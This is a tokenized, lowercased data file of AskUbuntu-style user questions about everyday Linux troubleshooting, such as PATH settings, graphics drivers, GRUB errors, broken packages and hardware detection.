508210	changes to $ path wo n't save after closing the terminal session	i downloaded the latest version of scala and saved it to /opt folder . then i tried to add /opt/scala-2.11.2/bin to the path in order to have easier access to commands like scala and scalac . after executing the command : export path= $ path : /opt/scala-2.11.2/bin/ and then : echo $ path i see the path in there . at that time i can also use the commands scala and scalac . then if i close the terminal and restart , the path /opt/scala-2.11.2/bin/ is not in echo $ path anymore . and thus i can not execute the commands . what is my problem ?
508211	elantech touchpad not detected as ps/2 in exo nifty 7385	my touchpad is not recognized ( is not present in the xinput list ) as a ps/2 device or a usb device after installing ubuntu 14.04 . my computer is an ultrabook that i bought with windows 8 , the touchpad worked perfectly in that os . ubuntu is installed as the only os , root is in a 32gb ssd and /home in a hdd 500gb . the ultrabook comes with uefi , i disabled fast boot , and boot in dual mode ( uefi and legacy ) . i can use an external usb mouse . my guess is that the device is disable or not recognized to work in legacy . could it be possible ? any ideas for detecting the touchpad ? tanks !
508213	terminal ls command not showing all files	i 'm familiarizing myself with the terminal , and trying to use the ls command is the directory /usr/bin . unfortunately , it does n't show me everything in the folder , the terminal cuts it off . how would i work around this ?
508218	how i got my error : malformed file	this question on askubuntu is about the error : malformed file not only here on askubuntu , but everywhere else i 've been reading about it , this is considered certain to be a grub issue . i thought it might help if i 'd tell you how it got to it : i 'm running an `` igel 5/4 thin client '' as a dlna ( upnp ) media server . i installed lubuntu 14.04 i686 ( for that 's the 'lightest ' ubuntu distribution i had that day ) . i generally use ssh to install , configure and test things . after everything met my needs i decided to get rid of lxde and followed this little guide exept that i had to use nano instead of gedit for i was on ssh . then i did a sudo shutdown -r now as usual and waited for my script 'espeak'ing to me about the current server state and network config . but it did n't . after three tries to reboot the machine i plugged a monitor in and was presented the above error message . i hope that 'll help a bit
508221	sound input device ( microphone ) not working	i have recently updated my laptop os from ubuntu 12.04 to 14.04 after updating the os , my laptop 's input device ie. , microphone is not working . earlier it was working with ubuntu 12.04 . also there is no sound input device driver detected i am using dell vostro 1014. after running command $ gstreamer-properties , output is : i think my microphone is working but is not being betected by ubuntu as in above screenshot . but after running pulse audio sound control , it shows input sound progress , it means input device is working but not being detected . even by sound recorder . after running alsamixer the output is :
508222	automate new route to far network on new pptp connection	when editing chap-secrets , i can assign an ip address to the account . one of the things that i notice is that , when a new connection is made , the pptp server automatically creates a route to that ip . what i need though , is a route to the far network and not just to the far router , so i was wondering if i could configure chap-secrets to accept connections from a network , instead of a single ip , so that the route would be configured accordingly , but values like 192.168.1.0/24 or other attempts do n't seem to be accepted . is there a way to do that automatically ?
508224	hwe upgrade causing system to reboot randomly	recently ran the hwe upgrade as the 12.04 hwe is going out of support today . the upgrade seemed to go fine and now the system reboots randomly and sometimes just hangs in a running state with no picture . running an amd apu if that is helpful .
508225	using system ( `` clear '' ) ; command to clean the screen yet last line printed . using gnu gcc compiler please help	i am using 'system ( `` clear '' ) ; ' command to clean the output screen yet the last line printed is displayed.i am using geany text editor using gnu gcc compiler.please help and tell me clear the whole screen . i am a college student and doing coding for the first time . thanks in advance .
508232	geany does n't find javac	i 'm attempting to compile a java program using geany . i get /bin/sh : 1 : javac : not found in the compiler window . the available help out there suggests to make sure you have openjdk installed , which i do ( 6 & 7 ) . poking around , i find javac in /usr/share/bash-completion/completions . ( i 'm hesitant to start messing around with java on ubuntu since it seems to be so tempermental . ) how do i point geany to my java installation ? any suggestions will be appreciated .
508236	how can i run code whenever a usb device is ( un ) plugged , without requiring root permissions ?	i have a script that i wish to run whenever i plug/unplug a mouse or keyboard to my usb port . there is already plenty of documentation on how to configure udev rules to run arbitrary scripts when a device is plugged or unplugged . but configuring those rules requires root permissions . and , although i do have root access on my machine , i 'm looking for a solution that does not require sudo , root , or writing udev rules . ( why ? because it will be easier to run , maintain and distribute ) most likely , the solution will use dbus , but i might be mistaken . ( by the way , i 'm and advanced user and former gentoo user , feel free to spit out technical details ! ) solutions that require root : autorun a script after i plugged or unplugged a usb device http : //granjow.net/udev-rules.html http : //hg.dfrank.ru/linux/my-udev-notify ( from this question/answer ) seemingly outdated solutions that do n't need root : this answer suggested cuttlefish , but the latest version is from 2012-08-24 . this thread suggested halevt , but the latest version is from 2010-02-18 . this question/answer poinsts to this tutorial that has c++ source-code using the outdated and deprecated hal .
508238	graphics and input settings load delay on boot	whenever i boot my system , after loging in , it takes half a minute for my display settings and my input settings to load . this means that for the first 30 seconds i have the default resolution settings and my keyboard mapping is not in the language i want it to be . this problem emerged after i performed a system-update/apt-get upgrade . i tried reinstalling xserver-xorg but that did not help . i have a nvidia gpu and i am currently running it with the xserver driver . changing to the nvidia driver does not help at all .
508240	how to `` hide the notification icon '' of chromium ?	details are given of how to hide the notification icon in windows and on a mac . so far i can not find an equivalent option in my version of chromium 36.0.1985.125 ubuntu 12.04 ( 283153 ) . if it ( already ) exists , where is it ? if it does n't , how to hide it anyway ? note that i do want to receive the notifications themselves , however have no need and do not want to see an extra icon in the top notification bar .
508243	how to completely remove qt environment ?	how to completely remove qt environment ? i installed qt creator integrated development from the ubuntu software center , then i compiled and installed qt 4.8.6 . there were few errors when i try to compile an application . i uninstalled/removed it via the ubuntu software center . but when i tried to install qt 5.3 i can see the qt 4.8 kit and recently accessed files . what should i do if i want to completely remove the qt in my system ? i want to uninstall all the 4.8.6 and , then try to reinstall the 5.3 .
508245	ubuntu 14.04.1 hangs every minute	every minute i get a second or so of minor lag . so far i know the following : it happens every minute around :00 seconds it only affects video , not audio i get a spike of iowait and disk write every time it happens using iotop , the culprit appears to be nautilus there are no jobs in /etc/cron.d/ set to go every minute nautilus does not have to have a window open for this to happen i have a dell studio 1558 with an intel i3 330m ( ironlake ) and integrated intel hd graphics . i 'm using whatever driver is included in ubuntu by default , specifically i915 according to lspci -k. i am not absolutely certain that that problem is nautilus , but i do n't know where to go from here . any answers or further debugging suggestions would be greatly appreciated . p.s . although my question seems to be a duplicate of this question , no answers were ever given in that thread , and the asker closed it because updating to 13.10 fixed the problem for him/her .
508246	black screen after grub - ubuntu server 14.04.4	i have a fit-pc3 ( specs here ) , but when i want to install ubuntu server ( by choosing the first option given on the grub menu ) , a black screen appears only . i know this is a common issue , and i know i have to edit some things in the commands before the boot , but nothing changed . so , here 's what i did : nomodeset on the boot command ( after quiet ) - > nothing acpi=off on the boot command ( after quiet ) - > nothing both of them - > nothing disabled efi mode ( = not even boots the usb drive ) - > nothing is there anything i forgot ? thanks .
508250	openvpn gui client for udp/tcp	is there any easy solution for openvpn being executed from desktop for non technician people so they only push a button and get connected to a external vpn ? most of my colleagues are non linux proficients . so , their interaction with cl is very limited .
508252	mount directory when navigating to it	is it possible to mount a drive when a user attempts to navigate to it ? for instance , if i were to have /dev/sda8 mounted upon /mnt/shared/ , could i only mount it when a process attempts to list the contents of the directory . would this require a simple fstab flag or a complex daemon watching for a system call ? sorry if this is a little brief , or irrelevant to the site , please point me in the right direction if i am .
508257	errors at bootup with miniiso	i have an old dell celeron inspiron 8600 and installed miniiso install . it took forever to install and the when the desktop finally did show up after logging in , the sidebar did not have any icons on it , only glide over boxes . i am thinking of trying an older os version of abuntu . i partitioned the entire hd first wiping out win xp . just want abuntu os on it . any ideas ? yojogees
508258	unable to boot ubuntu in acer aspire e1-571	i am unable to boot ubuntu in acer aspire e1-571 ( windows 7 ) , i tried dvd iso image , and usb hdd options to dual boot into ubuntu . it did nt work . how i can boot into acer aspire ?
508259	have more than one mysql version installed at a time	i currently have mysql 5.5 installed , and working . i 'd like to migrate everything to mysql 5.7 ( for a number of reasons , but mostly the spatial functions ) . i would like to have both 5.5 and 5.7 be running at the same time on the same box . how can i do that ?
508260	is there an email package that has a easy to use gui ?	i finally got postfix installed and running , but adding / removing users etc isnt as easy as a web based tool . is there any software packages i could install that would make managing email easier for both admins and users ?
508269	hide padlock symbols in thunar ( xubuntu )	i manage the computers in our local youth house . i 've made an new account and changed the ownership of the desktop folder and icons so they could n't be edited or removed . now there 's appearing a padlock icon next to every thumbnail . is there a way to hide those icons without changing the permissions ? they are very confusing for some of our members . screenshot of the padlock icons :
508272	graphics extremely sluggish after recent 12.04 update	after a recent 12.04 update my gnome-shell didnt work anymore , it just degrades to the classic design . i also tried installing fglrx to enable 3d-acceleration , but it didnt change anything . the whole ui is very sluggish , you can `` draw '' by draggin windows . graphics-card : ati radeon hd 7770 4gb ram
508273	can i safely use evolution 3.12.4-0ubuntu1 in ubuntu 14.04 ?	can i safely use evolution 3.12.4-0ubuntu1 in ubuntu 14.04 ? the current version ( 3.10.4 ) in the repository has a fatal flaw - creating new folders crashes evolution . this is apparently fixed in 3.12.4
508274	how to clone a user profile on the same computer ?	does anyone have a sure-fire way to make a new profile identical to another profile on the same computer ? i have to put that in bold because it seems every time i search online the only thing that comes up is how to copy a profile to another computer which , for all i know could be the same only extra work . i just installed powerbroker and joined a linux computer to the domain and would like to copy my local profile /home/johndoe into the new domain profile at /home/local/domain/johndoe . i tried this ( ca n't clone a user profile ? ) but not only do i not have a `` gdm '' service to stop , it rendered my domain profile useless . when i try logging in as domain\johndoe it starts to log back in but then goes back to the login screen . after joining to the domain and logging in for the first time with a new domain account , i logged back out and then logged in locally as the original user /home/johndoe , and ran these commands : sudo cp -a /home/johndoe/* /home/local/domain/johndoe/ sudo cp -a /home/johndoe/ . * /home/local/domain/johndoe/ sudo chown -r johndoe : johndoe /home/local/domain/johndoe anyone know why it 's not working or what went wrong ? when i entered that second command ( cp -a /home/johndoe/ . * /home/local/domain/johndoe/ ) here is what i got -- which i didn't/do n't think it 's a big deal but i 'm kind of a noob so i do n't know if these errors even matter ( even though i got the following errors i continued on with the chown command ) : cp : can not copy a directory , ‘/home/johndoe/..’ , into itself , ‘/home/local/domain/johndoe/’ cp : will not create hard link ‘/home/local/domain/johndoe/.adobe’ to directory ‘/home/local/domain/johndoe/./.adobe’ cp : will not create hard link ‘/home/local/domain/johndoe/.cache’ to directory ‘/home/local/domain/johndoe/./.cache’ cp : will not create hard link ‘/home/local/domain/johndoe/.compiz’ to directory ‘/home/local/domain/johndoe/./.compiz’ cp : will not create hard link ‘/home/local/domain/johndoe/.config’ to directory ‘/home/local/domain/johndoe/./.config’ cp : will not create hard link ‘/home/local/domain/johndoe/.dbus’ to directory ‘/home/local/domain/johndoe/./.dbus’ cp : will not create hard link ‘/home/local/domain/johndoe/.gconf’ to directory ‘/home/local/domain/johndoe/./.gconf’ cp : will not create hard link ‘/home/local/domain/johndoe/.local’ to directory ‘/home/local/domain/johndoe/./.local’ cp : will not create hard link ‘/home/local/domain/johndoe/.macromedia’ to directory ‘/home/local/domain/johndoe/./.macromedia’ cp : will not create hard link ‘/home/local/domain/johndoe/.mozilla’ to directory ‘/home/local/domain/johndoe/./.mozilla’ cp : will not create hard link ‘/home/local/domain/johndoe/.pki’ to directory ‘/home/local/domain/johndoe/./.pki’
508276	customizing the maas curtin ( fastpath ) preseed install	i 've been trying , unsuccessfully , to find documentation/examples on how to customize various things using the fastpath installer . the following doc gives a high-level overview : http : //bazaar.launchpad.net/~curtin-dev/curtin/trunk/view/head : /doc/topics/overview.rst a more practical example for modifying the network config : http : //astokes.org/customizing-fastpath-curtin-installations/ i 'm looking to customize the partition layout ( the default has no swap and 100 % to the root partition ) . anyone ?
508278	how to use ffmpeg to convert wma to mp3 recursively , importing from txt file ?	i tried different options from forums , but most of them are out of date ( ffmpeg tells me about it , like with -sameq option ) . im trying to understand the docs , but i ca n't . i want to know how to convert recursively with ffmpeg from wma to mp3 with a for example max bitrate of 192kbps in output ( but not 192 this if the original was 128kbps ) i have unless 14k wma files spread in many directories . so , i do n't want to move them . just convert them keeping filename and metadata , and delete them , if it would be possible to read the list of the files to convert from a txt file that i can create , one file per line . with this , i would manage to make the recursive search , an paste into it . thanks for any help . and still more thanks for any explanation about ffmpeg . caroxo ps : soundconverter used to be good , but slow . now neither one or the other . does n't work in 14.04 in many cases , like mine . i 'm using soundkonverter but is very slow . so , all this for preventing this recommendations . and i want to learn to use this powerful ffmpeg ! and the cli note : the script here below , was working in the first convertions . but for any reason that i cant explain , suddenly deleted the wma 's in conversion , without leaving the mp3 . so , i changed again to `` unsolved '' ( to prevent occasionally problem to someone 's else ) . the problem seems coming from avconv `` application provided invalid , non monotonically increasing dts to muxer in stream 0 : 23606 > = 21720 '' ( there are pastebins in the comments if there is someone interested in developing this bug ) . so , no avconv in the future .
508279	slow wifi on atheros ar9271 aka tl-wn722n	when i use my wifi usb stick ( tp-link tl-wn722n ) on ubuntu 14.04 i only get very low download speeds ( around 3,5 mbit/sec ) . when i reboot to windows i get the full 25 mbit/sec that my internet connection is capable of . i have also tried crunchbang 11 waldof , but there too i only get 3,5 mbit/sec download from the wifi usb stick . also , i am not the only one with that problem : http : //www.techques.com/question/24-111214/slow-wireless-with-tp-link-tl-wn722n-wireless-usb-adapter slow wifi download speed with a tp link tl-wn722n the only thing that people are suggesting is disabling hwcrypt : echo `` options ath9k_htc nohwcrypt=1 '' | sudo tee /etc/modprobe.d/ath9k.conf however , that does n't change anything for me . could this be a bug in the ath9k driver or the firmware ( htc_9271.fw ) ?
508282	ubuntu 12.04.5 as full download ?	if i 'm right 12.04.5 is available as from today . however , i do n't see a download for the ( full ) version , does this become available ( or not ) , or can one only upgrade to 12.04.5 from 12.04.4 ? thanks .
508284	ubuntu 14.04 freeze - kernel panic & fatal machine check	i 've got hp probook 470 g0 and ubuntu 14.04 64-bit . originally , it was preinstalled with linux suse enterprise but i 've erased and installed ubuntu 14.04 ( it was alpha that time ) . laptop was randomly freezing but i thought it was because of alpha release . problems were not solved until official release so i reinstalled the laptop with a `` release '' version . still no luck . laptop is 6 months old now and useless since it freezes almost everytime i use it . only hard reboot helps , mouse and keyboard are not responsive . one of the latest freezes was different ; it changed to a terminal view and reported a page of different messages including the kernel panic error . i 'm attaching the photo of the screen . it 's a bit blurry since i had to take it very quickly . could anyone advise if the error is due to a hardware malfunction or is it linked to kernel/driver that does not work with the hardware components well ? photo here : http : //i.stack.imgur.com/ez99p.jpg many thanks .
508291	ubuntu 14.04 intel graphics dual / extended monitors	once ubuntu user returned after a few years messing around with other distros . i have just installed 14.04 and i 'm having an issue with my dual monitors . i 've googled this issue only to find solutions for setups with dedicated graphics ( nvidia/ati ) cards . my laptop is using integrated intel graphics . i have two monitors attached to my docking station , but display is not detecting the seperate screens , and they are just being mirrored . i have tried it with dvi x 2 and dvi + vga , with no joy . it works fine on windows . any ideas ? i 'd like to run an extended desktop over dual monitors ( as one does ) . thanks in advance . edit : this is the output of xrandr : screen 0 : minimum 320 x 200 , current 1920 x 1200 , maximum 32767 x 32767 edp1 connected ( normal left inverted right x axis y axis ) 1366x768 60.1 + 40.0 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 connected primary 1920x1200+0+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 3840x1200 60.0 2560x1024 60.0 1920x1080 60.0 1600x1200 60.0 1680x1050 60.0 1280x1024 60.0 1280x960 60.0 1024x768 60.0 800x600 60.3 640x480 60.0 720x400 70.1 hdmi2 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis )
508295	resetting password in grub	i am trying to reset my password thru grub , but when i get to the command line `` type new unix password '' , it wo n't enter anything i type . the cursor does n't move . on a previous attempt , i got as far as `` retype password '' , but then got a message saying `` authentication token manipulation error '' . huh ? help , please .
508299	nvidia optimus on 14.04 overheating , screen tearing	when stressing the cpu and gpu with games , the cpu temp holds steady at about 97 . when using windows , it is about 50 . also , my external monitor has some strange triangle shaped screen tearing . what driver should i use to fix the overheat and screen tearing ?
508302	nvidia low graphics mode	i 'm running ubuntu 14.04.1 lts on a asus a53sv with nvidia 540m and intel sandy bridge i7 . i 've installed nvidia-331 proprietary driver and also the intel graphics official driver . after the last graphics update , when i switch to nvidia trough prime , the low graphics mode screen appears , and then i have to switch back to intel manually . i 've purged and installed again all nvidia packages , and the issue still remains . is there a way to fix this ? maybe a rollback of the update . 08/14/2014 update : i tried to purge all nvidia package ( removing them ) , rebooting , and them re-install them again , then reboot again . did not work ! . note : i think the cause of this problem rely on intel-graphics . maybe nvidia-prime does n't know the existing of this new intel driver . 08/15/2014 update i stumble upon this page than showed me how to remove the intel graphics driver sudo apt-get purge intel-linux-graphics-installer & & sudo apt-get autoremove then i rebooted , and nothing ... so i 'll just re-install ubuntu when i have the time .
508303	grub mismatched names rescue mode	my virtualbox ubuntu 14.04 was n't booting properly , and i read somewhere about updating my packages . along the way grub got updated and now i am stuck in rescue mode . it says `` error : mismatched names '' . i have no clue what to do and i ca n't find anything . any help ?
508305	off of start page , unable to connect to google	unable to access google off of the 14.1 firefox start page . problem is intermittent - no problem 8/7 am pdt . pm , `` connecting ... '' forever . going to google directly works fine , as do other sites .
508306	broken-package-after-update-linux-headers-error-brokencount-0 ? rq=1	my platform is ubuntu 12.04 . i have been reading and this text actually follows the flow on the link , broken package after update : linux-headers , error brokencount > 0 i have a broken package after an update . originally my disk was full but i have since fix that and i have 4+ gigs free space now . i then read on this forum and attempted to run the commands , sudo apt-get -f install sudo apt-get install -- fix-broken , and i got the following results : ( reading database ... 897477 files and directories currently installed . ) unpacking linux-image-3.2.0-67-generic ( from ... /linux-image-3.2.0-67-generic_3.2.0-67.101_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-67-generic_3.2.0-67.101_amd64.deb ( -- unpack ) : unable to create `/lib/modules/3.2.0-67-generic/kernel/drivers/usb/gadget/g_dbgp.ko.dpkg-new ' ( while processing `./lib/modules/3.2.0-67-generic/kernel/drivers/usb/gadget/g_dbgp.ko ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-67-generic /boot/vmlinuz-3.2.0-67-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-67-generic /boot/vmlinuz-3.2.0-67-generic unpacking linux-headers-3.2.0-67 ( from ... /linux-headers-3.2.0-67_3.2.0-67.101_all.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-67_3.2.0-67.101_all.deb ( -- unpack ) : error creating directory `./usr/src/linux-headers-3.2.0-67/crypto/async_tx ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) unpacking linux-headers-3.2.0-67-generic ( from ... /linux-headers-3.2.0-67-generic_3.2.0-67.101_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-67-generic_3.2.0-67.101_amd64.deb ( -- unpack ) : unable to create `/usr/src/linux-headers-3.2.0-67-generic/include/config/mtd/scb2/flash.h.dpkg-new ' ( while processing `./usr/src/linux-headers-3.2.0-67-generic/include/config/mtd/scb2/flash.h ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-67-generic_3.2.0-67.101_amd64.deb /var/cache/apt/archives/linux-headers-3.2.0-67_3.2.0-67.101_all.deb /var/cache/apt/archives/linux-headers-3.2.0-67-generic_3.2.0-67.101_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i then read some more and ran this command , df -i and got these results . filesystem inodes iused ifree iuse % mounted on /dev/sda3 915712 914583 1129 100 % / udev 253906 560 253346 1 % /dev tmpfs 256105 502 255603 1 % /run none 256105 3 256102 1 % /run/lock none 256105 5 256100 1 % /run/shm /dev/sda6 1220608 30875 1189733 3 % /home /dev/sdb1 821888880 141598 821747282 1 % /media/seagate backup plus drive so reading on i ran this command , sudo du -h /* | grep ' [ 0-9 ] m ' and i too got a huge list , 10 text pages to be exact . but at that point i get lost . i have n't any idea which file is too big or which is not . some of the files are as big as 354m /var/lib 636m /var 130m /var/cache/apt 260m /var/cache but nowhere in the list is the word , âtrash , â and when i run the command , sudo rm -r /root/.local/share/trash/files/ it tells me file trash not found . i think i understand that what i have to do is figure out how to get the line that reads /dev/sda3 915712 914583 1129 100 % / , to read something less than 100 % so that i have room to fix the broken package but i am at a loss how to do that . and i am apprehensive to just start erasing things willy-nilly . i am willing to read so if there is a link some place that talks all about this just point me and i will go digest as best as i am able . thanks to anyone for the help . bobby @ bobby-may-spark-often : ~ $ df -h filesystem size used avail use % mounted on /dev/sda3 14g 12g 2.1g 85 % / udev 992m 4.0k 992m 1 % /dev tmpfs 201m 1.1m 200m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1001m 140k 1001m 1 % /run/shm /dev/sda6 19g 14g 4.0g 78 % /home /dev/sdb1 932g 148g 784g 16 % /media/seagate backup plus drive /dev/sda7 104g 188m 99g 1 % /media/cd3f76e1-724f-4b8f-b29c-cc901b071fdb /dev/sda2 94g 84g 9.8g 90 % /media/069cbc4e9cbc3a4f bobby @ bobby-may-spark-often : ~ $ df -h /boot filesystem size used avail use % mounted on /dev/sda3 14g 12g 2.1g 85 % / bobby @ bobby-may-spark-often : ~ $
508309	libqt4-opengl : i386 has unmet dependencies	i am running ubuntu 14.04 64-bit . i have an error in my system tray : sudo apt-get update runs normally . but sudo apt-get upgrade returns the following : reading package lists ... done reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libqt4-opengl : i386 : depends : libqtcore4 : i386 ( = 4 : ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is installed e : unmet dependencies . try using -f. as suggested , i ran sudo apt-get install -f in an attempt to fix it . another error was returned : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libqt4-opengl : i386 the following packages will be upgraded : libqt4-opengl : i386 1 upgraded , 0 newly installed , 0 to remove and 10 not upgraded . need to get 0 b/300 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] dpkg : error : parsing file '/var/lib/dpkg/status ' near line 24899 package 'libqt4-opengl : i386 ' : 'depends ' field , reference to 'libqtcore4 ' : error in version : nothing after colon in version number e : sub-process /usr/bin/dpkg returned an error code ( 2 ) the output of sudo apt-cache policy libqtcore4 : i386 is : libqtcore4 : i386 : installed : 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 candidate : 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 version table : *** 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 0 500 http : //pt.archive.ubuntu.com/ubuntu/ trusty/main i386 packages 100 /var/lib/dpkg/status the output of cat -n /var/lib/dpkg/status | sed -n '/package : libqt4-opengl/ , /depends/p ' is : 24865 package : libqt4-opengl 24866 status : install ok installed 24867 priority : optional 24868 section : libs 24869 installed-size : 1228 24870 maintainer : kubuntu developers < kubuntu-devel @ lists.ubuntu.com > 24871 architecture : amd64 24872 multi-arch : same 24873 source : qt4-x11 24874 version : 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 24875 depends : libc6 ( > = 2.14 ) , libfreetype6 ( > = 2.2.1 ) , libgcc1 ( > = 1:4.1.1 ) , libgl1-mesa-glx | libgl1 , libqtcore4 ( = 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 ) , libqtgui4 ( = 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 ) , libstdc++6 ( > = 4.1.1 ) , libx11-6 , libxrender1 24889 package : libqt4-opengl 24890 status : install ok installed 24891 priority : optional 24892 section : libs 24893 installed-size : 1220 24894 maintainer : kubuntu developers < kubuntu-devel @ lists.ubuntu.com > 24895 architecture : i386 24896 multi-arch : same 24897 source : qt4-x11 24898 version : 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 24899 depends : libc6 ( > = 2.4 ) , libfreetype6 ( > = 2.2.1 ) , libgcc1 ( > = 1:4.1.1 ) , libgl1-mesa-glx | libgl1 , libqtcore4 ( = 4 : ) , libqtgui4 ( = 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 ) , libstdc++6 ( > = 4.1.1 ) , libx11-6 , libxrender1 how can i fix this issue ?
508311	i installed touchegg recently and i was trying to set it up right but this happened	i was trying to apply this `` what should i do to run after i have successfully installed touchegg on ubuntu 12.10 ? '' than this happened at step3.2 when trying to rebuild the .deb /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4008:4 : error : invalid preprocessing directive # gestures_sub_launcher_ # gestures_sub_launcher_.reset ( new nux : :gesturessubscription ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4009:4 : error : invalid preprocessing directive # gestures_sub_launcher_ # gestures_sub_launcher_- > setgestureclasses ( nux : :drag_gesture ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4010:4 : error : invalid preprocessing directive # gestures_sub_launcher_ # gestures_sub_launcher_- > setnumtouches ( 4 ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4011:4 : error : invalid preprocessing directive # gestures_sub_launcher_ # gestures_sub_launcher_- > setwindowid ( gdk_root_window ( ) ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4012:4 : error : invalid preprocessing directive # gestures_sub_launcher_ # gestures_sub_launcher_- > activate ( ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4014:4 : error : invalid preprocessing directive # gestures_sub_dash_ # gestures_sub_dash_.reset ( new nux : :gesturessubscription ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4015:4 : error : invalid preprocessing directive # gestures_sub_dash_ # gestures_sub_dash_- > setgestureclasses ( nux : :tap_gesture ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4016:4 : error : invalid preprocessing directive # gestures_sub_dash_ # gestures_sub_dash_- > setnumtouches ( 4 ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4017:4 : error : invalid preprocessing directive # gestures_sub_dash_ # gestures_sub_dash_- > setwindowid ( gdk_root_window ( ) ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4018:4 : error : invalid preprocessing directive # gestures_sub_dash_ # gestures_sub_dash_- > activate ( ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4020:4 : error : invalid preprocessing directive # gestures_sub_windows_ # gestures_sub_windows_.reset ( new nux : :gesturessubscription ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4021:4 : error : invalid preprocessing directive # gestures_sub_windows_ # gestures_sub_windows_- > setgestureclasses ( nux : :touch_gesture ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4024:4 : error : invalid preprocessing directive # gestures_sub_windows_ # gestures_sub_windows_- > setnumtouches ( 3 ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4025:4 : error : invalid preprocessing directive # gestures_sub_windows_ # gestures_sub_windows_- > setwindowid ( gdk_root_window ( ) ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4026:4 : error : invalid preprocessing directive # gestures_sub_windows_ # gestures_sub_windows_- > activate ( ) ; ^ /tmp/unity/unity-7.2.2+14.04.20140714/plugins/unityshell/src/unityshell.cpp:4004:1 : error : expected unqualified-id before â { â token { ^ cc1plus : error : unrecognized command line option `` -wno-unused-private-field '' [ -werror ] cc1plus : all warnings being treated as errors make [ 3 ] : *** [ plugins/unityshell/cmakefiles/unityshell.dir/src/unityshell.cpp.o ] error 1 make [ 3 ] : leaving directory `/tmp/unity/unity-7.2.2+14.04.20140714/obj-x86_64-linux-gnu' make [ 2 ] : *** [ plugins/unityshell/cmakefiles/unityshell.dir/all ] error 2 make [ 2 ] : leaving directory `/tmp/unity/unity-7.2.2+14.04.20140714/obj-x86_64-linux-gnu' make [ 1 ] : *** [ all ] error 2 make [ 1 ] : leaving directory `/tmp/unity/unity-7.2.2+14.04.20140714/obj-x86_64-linux-gnu' dh_auto_build : make -j1 returned exit code 2 make : *** [ build ] error 2 dpkg-buildpackage : error : debian/rules build gave error exit status 2
508312	write permission for guest session	what permissions should i set to a directory to make it accessible in read-write mode for guest session ? i do n't want to make it writable for everyone , just only for guest session , so simple : chmod o+rwx does not satisfy me . is there a group for guest session permissions , that i can use ?
508315	tab key stops working without modifiers	running ubuntu 14.04 , unity 7.2.1 on dell e5540 laptop . time after time tab key starts working a little strange . does n't work by itself - autocompletion in bash or switching between inputs in a browser forward does n't work with ctrl - switching between tabs in browser forward does work with shift - switching between inputs in a browser backwards does work with ctrl+shift - switching between tabs in browser backwards does work with alt - switching between windows the issue appears without any reason i can think of and disappears after a while without me doing anything about it . seen same behavior on my previous laptop , which was also from dell and was on ubuntu 12.04 .
508316	juju deploy : series does not match	i ran these commands : juju generate-config juju switch manual then i edited the environment file to add the host address . then : juju bootstrap juju deploy -- to 0 juju-gui and i got the error message : error can not assign unit `` juju-gui/0 '' to machine 0 : series does not match i got similar errors trying to deploy mysql to another machine after add-machine but i guess the answer to the above question can solve the other case as well .
508318	can not use wacom intuos ctl-480 and touch tablet on ubuntu ?	i am extremely new to linux and just recently downloaded ubuntu to my chromebook . i really need to install my wacom intuos pen and touch tablet but the system can not recognize it . i have already gone through the terminal and used codes and such , but always got a negative response . i 'm not very good when it comes to working in the terminal , is it possible that there is any other way i can install said tablet ? thanks !
